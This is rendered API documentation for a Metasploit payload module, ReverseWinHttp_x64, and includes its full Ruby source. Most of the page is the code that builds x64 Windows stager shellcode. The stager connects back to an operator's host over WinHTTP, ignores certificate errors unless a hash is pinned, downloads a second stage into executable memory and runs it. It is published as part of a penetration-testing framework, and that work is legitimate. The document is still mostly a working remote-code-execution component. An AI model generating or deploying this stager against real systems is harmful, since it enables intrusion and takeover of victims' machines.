Module: Msf::Payload::Windows::ReverseWinHttp_x64
- Includes:
- ReverseHttp_x64
- Included in:
- ReverseWinHttps_x64
- Defined in:
- lib/msf/core/payload/windows/x64/reverse_win_http_x64.rb
Overview
Complex payload generation for Windows ARCH_X86 that speak HTTP(S) using WinHTTP
Constant Summary
Constants included from Rex::Payloads::Meterpreter::UriChecksum
Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN_MAX_LEN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITP, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITW, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INIT_CONN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_MIN_LEN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_MODES, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_UUID_MIN_LEN
Instance Method Summary collapse
-
#asm_generate_wchar_array(str) ⇒ Object
Convert a string into a NULL-terminated wchar byte array.
-
#asm_reverse_winhttp(opts = {}) ⇒ Object
Generate an assembly stub with the configured feature set and options.
-
#generate(opts = {}) ⇒ Object
Generate the first stage.
-
#generate_reverse_winhttp(opts = {}) ⇒ Object
Generate and compile the stager.
-
#initialize(*args) ⇒ Object
Register reverse_winhttp specific options.
-
#required_space ⇒ Object
Determine the maximum amount of space required for the features requested.
- #transport_config(opts = {}) ⇒ Object
Methods included from ReverseHttp_x64
#asm_generate_ascii_array, #asm_reverse_http, #generate_reverse_http, #generate_small_uri, #generate_uri, #get_custom_headers, #stage_over_connection?, #wfs_delay
Methods included from UUID::Options
#generate_payload_uuid, #generate_uri_uuid_mode, #record_payload_uuid, #record_payload_uuid_url
Methods included from Rex::Payloads::Meterpreter::UriChecksum
#generate_uri_checksum, #generate_uri_uuid, #process_uri_resource, #uri_checksum_lookup
Methods included from Exitfunk_x64
Methods included from BlockApi_x64
Methods included from Msf::Payload::Windows
#apply_prepends, exit_types, #handle_intermediate_stage, #include_send_uuid, #replace_var
Methods included from PrependMigrate
#apply_prepend_migrate, #prepend_migrate, #prepend_migrate?, #prepend_migrate_64
Methods included from TransportConfig
#transport_config_bind_named_pipe, #transport_config_bind_tcp, #transport_config_reverse_http, #transport_config_reverse_https, #transport_config_reverse_ipv6_tcp, #transport_config_reverse_named_pipe, #transport_config_reverse_tcp, #transport_config_reverse_udp, #transport_uri_components
Instance Method Details
#asm_generate_wchar_array(str) ⇒ Object
Convert a string into a NULL-terminated wchar byte array
107 108 109 110 111 112 113 114 |
# File 'lib/msf/core/payload/windows/x64/reverse_win_http_x64.rb', line 107 def asm_generate_wchar_array(str) (str.to_s + "\x00"). unpack("C*"). pack("v*"). unpack("C*"). map{ |c| "0x%.2x" % c }. join(",") end |
#asm_reverse_winhttp(opts = {}) ⇒ Object
Generate an assembly stub with the configured feature set and options.
133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656 657 658 659 660 661 |
# File 'lib/msf/core/payload/windows/x64/reverse_win_http_x64.rb', line 133 def asm_reverse_winhttp(opts={}) retry_count = [opts[:retry_count].to_i, 1].max verify_ssl = nil encoded_cert_hash = nil encoded_uri = asm_generate_wchar_array(opts[:uri]) encoded_host = asm_generate_wchar_array(opts[:host]) # this is used by the IE proxy functionality when an autoconfiguration URL # is specified. We need the full URL otherwise the call to resolve the proxy # for the URL doesn't work. full_url = 'http' full_url << 's' if opts[:ssl] full_url << '://' << opts[:host] full_url << ":#{opts[:port]}" if opts[:ssl] && opts[:port] != 443 full_url << ":#{opts[:port]}" if !opts[:ssl] && opts[:port] != 80 full_url << opts[:uri] encoded_full_url = asm_generate_wchar_array(full_url) encoded_uri_index = (full_url.length - opts[:uri].length) * 2 if opts[:ssl] && opts[:verify_cert_hash] verify_ssl = true encoded_cert_hash = opts[:verify_cert_hash].unpack("C*").map{|c| "0x%.2x" % c }.join(",") end proxy_enabled = !!(opts[:proxy_host].to_s.strip.length > 0) proxy_info = "" if proxy_enabled if opts[:proxy_type].to_s.downcase == "socks" proxy_info << "socks=" else proxy_info << "http://" end proxy_info << opts[:proxy_host].to_s if opts[:proxy_port].to_i > 0 proxy_info << ":#{opts[:proxy_port]}" end proxy_info = asm_generate_wchar_array(proxy_info) end proxy_user = opts[:proxy_user].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:proxy_user]) proxy_pass = opts[:proxy_pass].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:proxy_pass]) custom_headers = opts[:custom_headers].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:custom_headers]) http_open_flags = 0x00000100 # WINHTTP_FLAG_BYPASS_PROXY_CACHE secure_flags = ( 0x00002000 | # SECURITY_FLAG_IGNORE_CERT_DATE_INVALID 0x00001000 | # SECURITY_FLAG_IGNORE_CERT_CN_INVALID 0x00000200 | # SECURITY_FLAG_IGNORE_WRONG_USAGE 0x00000100 ) # SECURITY_FLAG_IGNORE_UNKNOWN_CA if opts[:ssl] http_open_flags |= 0x00800000 # WINHTTP_FLAG_SECURE end ie_proxy_autodect = ( 0x00000001 | # WINHTTP_AUTO_DETECT_TYPE_DHCP 0x00000002 ) # WINHTTP_AUTO_DETECT_TYPE_DNS_A ie_proxy_flags = ( 0x00000001 | # WINHTTP_AUTOPROXY_AUTO_DETECT 0x00000002 ) # WINHTTP_AUTOPROXY_CONFIG_URL asm = %Q^ xor rbx, rbx load_winhttp: push rbx ; stack alignment mov r14, 'winhttp' push r14 ; Push 'winhttp',0 onto the stack mov rcx, rsp ; lpFileName (stackpointer) mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} ; LoadLibraryA call rbp ^ if verify_ssl asm << %Q^ load_crypt32: push rbx ; stack alignment mov r14, 'crypt32' push r14 ; Push 'crypt32',0 onto the stack mov rcx, rsp ; lpFileName (stackpointer) mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} ; LoadLibraryA call rbp ^ end asm << %Q^ winhttpopen: push rbx ; stack alignment push rbx ; NULL pointer mov rcx, rsp ; pwszAgent ("") ^ if proxy_enabled asm << %Q^ push 3 pop rdx ; dwAccessType (3=WINHTTP_ACCESS_TYPE_NAMED_PROXY) call load_proxy_name db #{proxy_info} ; proxy information load_proxy_name: pop r8 ; pwszProxyName (stack pointer) ^ else asm << %Q^ push rbx pop rdx ; dwAccessType (0=WINHTTP_ACCESS_TYPE_DEFAULT_PROXY) xor r8, r8 ; pwszProxyName (NULL) ^ end asm << %Q^ xor r9, r9 ; pwszProxyBypass (NULL) push rbx ; stack alignment push rbx ; dwFlags (0) mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpen')}; WinHttpOpen call rbp ^ if opts[:proxy_ie] == true && !proxy_enabled asm << %Q^ mov r12, rax ; Session handle is required later for ie proxy ^ end asm << %Q^ call load_server_host db #{encoded_host} load_server_host: pop rdx ; pwszServerName mov rcx, rax ; hSession mov r8, #{opts[:port]} ; nServerPort xor r9, r9 ; dwReserved mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpConnect')} ; WinHttpConnect call rbp call winhttpopenrequest ^ if opts[:proxy_ie] == true && !proxy_enabled asm << %Q^ db #{encoded_full_url} ^ else asm << %Q^ db #{encoded_uri} ^ end asm << %Q^ winhttpopenrequest: mov rcx, rax ; hConnect push rbx pop rdx ; pwszVerb (NULL=GET) pop r8 ; pwszObjectName (URI) ^ if opts[:proxy_ie] == true && !proxy_enabled asm << %Q^ mov r13, r8 ; store a copy of the URL for later add r8, #{encoded_uri_index} ; move r8 up to where the URI stars ^ end asm << %Q^ xor r9, r9 ; pwszVersion (NULL) push rbx ; stack alignment mov rax, #{"0x%.8x" % http_open_flags} ; dwFlags push rax push rbx ; lppwszAcceptType (NULL) push rbx ; pwszReferer (NULL) mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpenRequest')} ; WinHttpOpenRequest call rbp prepare: mov rsi, rax ; Store hConnection in rsi ^ if proxy_enabled && proxy_user asm << %Q^ call load_proxy_user ; puts proxy_user pointer on stack db #{proxy_user} load_proxy_user: pop r8 ; lpBuffer (stack pointer) mov rcx, rsi ; hConnection (connection handle) mov rdx, 0x1002 ; (0x1002=WINHTTP_OPTION_PROXY_USERNAME) push #{proxy_user.length} ; dwBufferLength (proxy_user length) pop r9 mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption call rbp ^ end if proxy_enabled && proxy_pass asm << %Q^ call load_proxy_pass ; puts proxy_pass pointer on stack db #{proxy_pass} load_proxy_pass: pop r8 ; lpBuffer (stack pointer) mov rcx, rsi ; hConnection (connection handle) mov rdx, 0x1003 ; (0x1003=WINHTTP_OPTION_PROXY_PASSWORD) push #{proxy_pass.length} ; dwBufferLength (proxy_pass length) pop r9 mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption call rbp ^ end if opts[:proxy_ie] == true && !proxy_enabled asm << %Q^ ; allocate space for WINHTTP_CURRENT_USER_IE_PROXY_CONFIG, which is ; a 32-byte structure sub rax, 32 mov rdi, rsp ; save a pointer to this buffer mov rcx, rdi ; this buffer is also the parameter to the function mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetIEProxyConfigForCurrentUser')} ; WinHttpGetIEProxyConfigForCurrentUser call rbp test eax, eax ; skip the rest of the proxy stuff if the call failed jz ie_proxy_setup_finish ; we don't care about the "auto detect" flag, as it doesn't seem to ; impact us at all. ; check if there's an auto configuration URL mov rax, [rdi+8] test eax, eax jz ie_proxy_manual ; set up the autoproxy structure on the stack and get it ready to pass ; into the target function mov rcx, rbx inc rcx shl rcx, 32 push rcx ; dwReserved (0) and fAutoLoginIfChallenged push rbx ; lpvReserved (NULL) push rax ; lpszAutoConfigUrl mov rax, #{ie_proxy_flags | ie_proxy_autodect << 32} ; dwAutoDetectFlags and dwFlags push rax mov r8, rsp ; put the structure in the parameter list ; prepare the proxy info buffer, 32 bytes required sub rsp, 32 mov rdi, rsp ; we'll need a pointer to this later mov r9, rdi ; pass it as the 4th parameter ; rest of the parameters mov rcx, r12 ; hSession mov rdx, r13 ; lpcwszUrl ; finally make the call mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetProxyForUrl')} ; WinHttpGetProxyForUrl call rbp test eax, eax ; skip the rest of the proxy stuff if the call failed jz ie_proxy_setup_finish jmp set_ie_proxy ; rdi points to the filled out proxy structure ie_proxy_manual: mov rax, [rdi+16] ; check for the manual proxy test eax, eax jz ie_proxy_setup_finish add rdi, 8 push 3 pop rax mov [rdi], rax ; set dwAccessType (3=WINHTTP_ACCESS_TYPE_NAMED_PROXY) ; fallthrough to set the ie proxy set_ie_proxy: ; we assume that rdi is going to point to the proxy options mov r8, rdi ; lpBuffer (proxy options) push 24 pop r9 ; dwBufferLength (size of proxy options) mov rcx, rsi ; hConnection (connection handle) push 38 pop rdx ; (38=WINHTTP_OPTION_PROXY) mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption call rbp ie_proxy_setup_finish: ^ end if retry_count > 1 asm << %Q^ push #{retry_count} pop rdi retryrequest: ^ end if opts[:ssl] asm << %Q^ winhttpsetoption_ssl: mov rcx, rsi ; hRequest (request handle) push 31 pop rdx ; dwOption (31=WINHTTP_OPTION_SECURITY_FLAGS) push rdx ; stack alignment push #{"0x%.8x" % secure_flags} ; flags mov r8, rsp ; lpBuffer (pointer to flags) push 4 pop r9 ; dwBufferLength (4 = size of flags) mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption call rbp xor r8, r8 ; dwHeadersLen (0) ^ end if custom_headers asm << %Q^ call get_req_headers ; lpszHeaders (pointer to the custom headers) db #{custom_headers} get_req_headers: pop rdx ; lpszHeaders dec r8 ; dwHeadersLength (assume NULL terminated) ^ else asm << %Q^ push rbx pop rdx ; lpszHeaders (NULL) ^ end asm << %Q^ mov rcx, rsi ; hRequest (request handle) xor r9, r9 ; lpszVersion (NULL) push rbx ; stack alignment push rbx ; dwContext (0) push rbx ; dwTotalLength (0) push rbx ; dwOptionalLength (0) mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSendRequest')} ; WinHttpSendRequest call rbp test eax, eax jnz handle_response ^ if retry_count > 1 asm << %Q^ try_it_again: dec rdi jz failure jmp retryrequest ^ else asm << %Q^ jmp failure ^ end if opts[:exitfunk] asm << %Q^ failure: call exitfunk ^ else asm << %Q^ failure: ; hard-coded to ExitProcess(whatever) for size mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} call rbp ; ExitProcess(whatever) ^ end asm << %Q^ handle_response: mov rcx, rsi ; hRequest push rbx pop rdx ; lpReserved (NULL) mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')} ; WinHttpReceiveResponse call rbp test eax, eax ; make sure the request succeeds jz failure ^ if verify_ssl asm << %Q^ ssl_cert_get_context: mov rcx, rsi ; Request handle (hInternet) push 78 ; WINHTTP_OPTION_SERVER_CERT_CONTEXT pop rdx ; (dwOption) ; Thanks to things that are on the stack from previous calls, we don't need to ; worry about adding something to the stack to have space for the cert pointer, ; so we won't worry about doing it, it'll save us bytes! mov r8, rsp ; Stack pointer (lpBuffer) mov r14, r8 ; Back the stack pointer up for later use push rbx ; 0 for alignment push 8 ; One whole pointer mov r9, rsp ; Stack pointer (lpdwBufferLength) mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpQueryOption')} call rbp test eax, eax ; use eax instead of rax, saves a byte jz failure ; Bail out if we couldn't get the certificate context ssl_cert_get_server_hash: mov rcx, [r14] ; Cert context pointer (pCertContext) push 24 ; sha1 length, rounded to multiple of 8 mov r9, rsp ; Address of length (pcbData) mov r15, rsp ; Backup address of length sub rsp, [r9] ; Allocate 20 bytes for the hash output mov r8, rsp ; 20 byte buffer (pvData) mov r14, r8 ; Back the stack pointer up for later use push 3 pop rdx ; CERT_SHA1_HASH_PROP_ID (dwPropId) mov r10, #{Rex::Text.block_api_hash('crypt32.dll', 'CertGetCertificateContextProperty')} call rbp test eax, eax ; use eax instead of rax, saves a byte jz failure ; Bail out if we couldn't get the certificate context ssl_cert_start_verify: call ssl_cert_compare_hashes db #{encoded_cert_hash} ssl_cert_compare_hashes: pop rax ; get the expected hash xchg rax, rsi ; swap hash and handle for now mov rdi, r14 ; pointer to the retrieved hash mov rcx, [r15] ; number of bytes to compare repe cmpsb ; do the hash comparison jnz failure ; Bail out if the result isn't zero xchg rax, rsi ; swap hash and handle back! ; Our certificate hash was valid, hurray! ^ end if defined?(read_stage_size?) && read_stage_size? asm << %^ allocate_memory: ; read incoming stage size push rbx ; buffer for stage size mov rdx, rsp ; lpBuffer (pointer to mem) push rbx ; buffer for bytesRead mov r9, rsp ; lpdwNumberOfBytesRead (stack pointer) push 4 pop r8 ; dwNumberOfBytesToRead (4 bytes) mov rcx, rsi ; hFile (request handle) mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData call rbp test eax, eax ; did the download fail? jz failure add rsp, 40 ; remove 32 bytes of home space and 8 bytes of bytesRead ; allocate memory for stage push rbx pop rcx ; lpAddress (NULL) pop rdx ; incoming stage size (Used in InternetReadFile) mov rbx, rdx ; save off stage size (rdx is volatile) push 0x40 pop r9 ; flProtect (0x40=PAGE_EXECUTE_READWRITE) mov r8, 0x1000 ; flAllocationType (0x1000=MEM_COMMIT) mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} call rbp ;download stage download_prep: xchg rax, rbx ; store the allocated base in rbx push rbx ; store allocated memory address for later ret push rbx ; temp storage for byte count mov rdi, rsp ; rdi is the &bytesRead mov rcx, rsi ; hFile (request handle) mov r8, rax ; dwNumberOfBytesToRead (incoming stage size) mov rdx, rbx ; lpBuffer (pointer to mem) mov r9, rdi ; lpdwNumberOfByteRead (stack pointer) mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData call rbp add rsp, 32 ; clean up reserved space test eax, eax ; did the download fail? jz failure pop rax ; clear up reserved space ^ else asm << %Q^ allocate_memory: push rbx pop rcx ; lpAddress (NULL) push 0x40 pop rdx mov r9, rdx ; flProtect (0x40=PAGE_EXECUTE_READWRITE) shl edx, 16 ; dwSize mov r8, 0x1000 ; flAllocationType (0x1000=MEM_COMMIT) mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} ; VirtualAlloc call rbp download_prep: xchg rax, rbx ; store the allocated base in rbx push rbx ; store a copy for later push rbx ; temp storage for byte count mov rdi, rsp ; rdi is the &bytesRead download_more: mov rcx, rsi ; hRequest (request handle) mov rdx, rbx ; lpBuffer (pointer to mem) mov r8, 8192 ; dwNumberOfBytesToRead (8k) mov r9, rdi ; lpdwNumberOfByteRead (stack pointer) mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData call rbp add rsp, 32 ; clean up reserved space test eax, eax ; did the download fail? jz failure mov ax, word ptr [rdi] ; extract the read byte count add rbx, rax ; buffer += bytes read test eax, eax ; are we done? jnz download_more ; keep going pop rax ; clear up reserved space ^ end asm << %Q^ execute_stage: ret ; return to the stored stage address ^ if opts[:exitfunk] asm << asm_exitfunk(opts) end asm end |
#generate(opts = {}) ⇒ Object
Generate the first stage
29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 |
# File 'lib/msf/core/payload/windows/x64/reverse_win_http_x64.rb', line 29 def generate(opts={}) ds = opts[:datastore] || datastore conf = { ssl: opts[:ssl] || false, host: ds['LHOST'] || '127.127.127.127', port: ds['LPORT'] } # Add extra options if we have enough space if self.available_space.nil? || (cached_size && required_space <= self.available_space) conf[:uri] = luri + generate_uri conf[:exitfunk] = ds['EXITFUNC'] conf[:verify_cert_hash] = opts[:verify_cert_hash] conf[:proxy_host] = ds['HttpProxyHost'] conf[:proxy_port] = ds['HttpProxyPort'] conf[:proxy_user] = ds['HttpProxyUser'] conf[:proxy_pass] = ds['HttpProxyPass'] conf[:proxy_type] = ds['HttpProxyType'] conf[:retry_count] = ds['StagerRetryCount'] conf[:proxy_ie] = ds['HttpProxyIE'] conf[:custom_headers] = get_custom_headers(ds) else # Otherwise default to small URIs conf[:uri] = luri + generate_small_uri end generate_reverse_winhttp(conf) end |
#generate_reverse_winhttp(opts = {}) ⇒ Object
Generate and compile the stager
65 66 67 68 69 70 71 72 73 74 75 76 |
# File 'lib/msf/core/payload/windows/x64/reverse_win_http_x64.rb', line 65 def generate_reverse_winhttp(opts={}) combined_asm = %Q^ cld ; Clear the direction flag. and rsp, ~0xf ; Ensure RSP is 16 byte aligned call start ; Call start, this pushes the address of 'api_call' onto the stack. #{asm_block_api} start: pop rbp ; rbp now contains the block API pointer #{asm_reverse_winhttp(opts)} ^ Metasm::Shellcode.assemble(Metasm::X64.new, combined_asm).encode_string end |
#initialize(*args) ⇒ Object
Register reverse_winhttp specific options
19 20 21 22 23 24 |
# File 'lib/msf/core/payload/windows/x64/reverse_win_http_x64.rb', line 19 def initialize(*args) super ([ OptBool.new('HttpProxyIE', 'Enable use of IE proxy settings', default: true, aliases: ['PayloadProxyIE']) ], self.class) end |
#required_space ⇒ Object
Determine the maximum amount of space required for the features requested
81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 |
# File 'lib/msf/core/payload/windows/x64/reverse_win_http_x64.rb', line 81 def required_space # Start with our cached default generated size space = cached_size # Add 100 bytes for the encoder to have some room space += 100 # Make room for the maximum possible URL length (wchars) space += 512 * 2 # proxy (wchars) space += 128 * 2 # EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others) space += 31 # Custom headers? Ugh, impossible to tell space += 512 # The final estimated size space end |
#transport_config(opts = {}) ⇒ Object
58 59 60 |
# File 'lib/msf/core/payload/windows/x64/reverse_win_http_x64.rb', line 58 def transport_config(opts={}) transport_config_reverse_http(opts) end |